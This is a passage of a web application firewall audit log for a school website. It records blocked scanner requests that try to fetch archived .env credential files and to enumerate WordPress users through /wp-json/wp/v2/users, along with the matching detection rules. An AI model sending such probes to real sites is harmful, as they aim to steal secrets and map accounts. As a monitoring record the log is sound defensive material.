text/html; charset=iso-8859-1 --862b634d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687607853 694 (- - -) Stopwatch2: 1747106687607853 694; combined=266, p1=234, p2=0, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --862b634d-Z-- --3e376d66-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKuwAAAM0 103.236.140.4 37234 103.236.140.4 8181 --3e376d66-B-- GET /.env.zip HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8 --3e376d66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e376d66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687643292 693 (- - -) Stopwatch2: 1747106687643292 693; combined=252, p1=211, p2=0, p3=0, p4=0, p5=40, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e376d66-Z-- --a6ca394c-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKvAAAAMs 103.236.140.4 37236 103.236.140.4 8181 --a6ca394c-B-- GET /.env.zip HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 --a6ca394c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6ca394c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687660670 657 (- - -) Stopwatch2: 1747106687660670 657; combined=268, p1=236, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6ca394c-Z-- --ab8da428-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKvQAAAM4 103.236.140.4 37238 103.236.140.4 8181 --ab8da428-B-- GET /.env.zip HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 --ab8da428-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab8da428-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687731486 629 (- - -) Stopwatch2: 1747106687731486 629; combined=247, p1=213, p2=0, p3=0, p4=0, p5=33, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab8da428-Z-- --ecc73350-A-- [13/May/2025:10:24:47 +0700] aCK7f4_RcapTWo3LoydOwgAAAEo 103.236.140.4 37240 103.236.140.4 8181 --ecc73350-B-- GET /.env.rar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 --ecc73350-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecc73350-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687765476 719 (- - -) Stopwatch2: 1747106687765476 719; combined=307, p1=272, p2=0, p3=0, p4=0, p5=35, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecc73350-Z-- --ac6aae79-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKvgAAAM8 103.236.140.4 37242 103.236.140.4 8181 --ac6aae79-B-- GET /.env.rar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 --ac6aae79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac6aae79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687801012 650 (- - -) Stopwatch2: 1747106687801012 650; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac6aae79-Z-- --1d32fc4f-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKvwAAAMw 103.236.140.4 37244 103.236.140.4 8181 --1d32fc4f-B-- GET /.env.rar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 --1d32fc4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d32fc4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687881189 721 (- - -) Stopwatch2: 1747106687881189 721; combined=291, p1=247, p2=0, p3=0, p4=0, p5=44, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d32fc4f-Z-- --79e2fd6c-A-- [13/May/2025:10:24:47 +0700] aCK7f-O55leZpQyxFsYLOwAAAJI 103.236.140.4 37246 103.236.140.4 8181 --79e2fd6c-B-- GET /.env.rar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 --79e2fd6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79e2fd6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687958707 675 (- - -) Stopwatch2: 1747106687958707 675; combined=265, p1=229, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79e2fd6c-Z-- --7100da26-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKwAAAANA 103.236.140.4 37248 103.236.140.4 8181 --7100da26-B-- GET /.env.tar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 --7100da26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7100da26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687992873 668 (- - -) Stopwatch2: 1747106687992873 668; combined=273, p1=217, p2=0, p3=0, p4=0, p5=56, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7100da26-Z-- --f846c00e-A-- [13/May/2025:10:24:48 +0700] aCK7gI3mg5f2L4Eof6PKwQAAANE 103.236.140.4 37250 103.236.140.4 8181 --f846c00e-B-- GET /.env.tar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --f846c00e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f846c00e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688028079 670 (- - -) Stopwatch2: 1747106688028079 670; combined=270, p1=238, p2=0, p3=0, p4=0, p5=32, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f846c00e-Z-- --88b46b56-A-- [13/May/2025:10:24:48 +0700] aCK7gI3mg5f2L4Eof6PKwgAAANI 103.236.140.4 37252 103.236.140.4 8181 --88b46b56-B-- GET /.env.tar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 --88b46b56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88b46b56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688100775 698 (- - -) Stopwatch2: 1747106688100775 698; combined=271, p1=239, p2=0, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88b46b56-Z-- --5ee5846a-A-- [13/May/2025:10:24:48 +0700] aCK7gOO55leZpQyxFsYLPAAAAI4 103.236.140.4 37254 103.236.140.4 8181 --5ee5846a-B-- GET /.env.tar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 --5ee5846a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ee5846a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688171352 712 (- - -) Stopwatch2: 1747106688171352 712; combined=297, p1=269, p2=0, p3=0, p4=0, p5=28, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ee5846a-Z-- --ecd59556-A-- [13/May/2025:10:24:48 +0700] aCK7gI3mg5f2L4Eof6PKwwAAANM 103.236.140.4 37256 103.236.140.4 8181 --ecd59556-B-- GET /.env.tar.gz HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 --ecd59556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecd59556-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688208263 658 (- - -) Stopwatch2: 1747106688208263 658; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecd59556-Z-- --55485c3b-A-- [13/May/2025:10:24:48 +0700] aCK7gI3mg5f2L4Eof6PKxAAAANQ 103.236.140.4 37258 103.236.140.4 8181 --55485c3b-B-- GET /.env.tar.gz HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 --55485c3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55485c3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688243323 694 (- - -) Stopwatch2: 1747106688243323 694; combined=270, p1=238, p2=0, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55485c3b-Z-- --760b1a3a-A-- [13/May/2025:10:24:48 +0700] aCK7gI3mg5f2L4Eof6PKxQAAANU 103.236.140.4 37260 103.236.140.4 8181 --760b1a3a-B-- GET /.env.tar.gz HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 --760b1a3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --760b1a3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688316386 642 (- - -) Stopwatch2: 1747106688316386 642; combined=245, p1=212, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --760b1a3a-Z-- --1f932239-A-- [13/May/2025:10:24:48 +0700] aCK7gI3mg5f2L4Eof6PKxgAAANY 103.236.140.4 37262 103.236.140.4 8181 --1f932239-B-- GET /.env.tar.gz HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --1f932239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f932239-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688393307 695 (- - -) Stopwatch2: 1747106688393307 695; combined=265, p1=230, p2=0, p3=0, p4=0, p5=34, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f932239-Z-- --230b2b1b-A-- [13/May/2025:10:34:42 +0700] aCK90q50YiewH3i7i4ejxgAAAAo 103.236.140.4 52204 103.236.140.4 8181 --230b2b1b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 95.38.75.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 95.38.75.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --230b2b1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --230b2b1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747107282663008 1928 (- - -) Stopwatch2: 1747107282663008 1928; combined=999, p1=327, p2=636, p3=0, p4=0, p5=36, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --230b2b1b-Z-- --3260682a-A-- [13/May/2025:10:37:56 +0700] aCK-lI3mg5f2L4Eof6PVHQAAANQ 103.236.140.4 34878 103.236.140.4 8181 --3260682a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.212.135.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.212.135.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3260682a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3260682a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747107476946274 2779 (- - -) Stopwatch2: 1747107476946274 2779; combined=1126, p1=354, p2=747, p3=0, p4=0, p5=25, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3260682a-Z-- --4aff6a1f-A-- [13/May/2025:10:45:43 +0700] aCLAZ4_RcapTWo3LoyddCAAAAEQ 103.236.140.4 60544 103.236.140.4 8181 --4aff6a1f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.5.71.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.5.71.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4aff6a1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4aff6a1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747107943265380 1819 (- - -) Stopwatch2: 1747107943265380 1819; combined=988, p1=271, p2=698, p3=0, p4=0, p5=19, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4aff6a1f-Z-- --f0795b16-A-- [13/May/2025:11:06:32 +0700] aCLFSI3mg5f2L4Eof6PssQAAAMQ 103.236.140.4 40556 103.236.140.4 8181 --f0795b16-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.86.112.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.86.112.224 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f0795b16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: 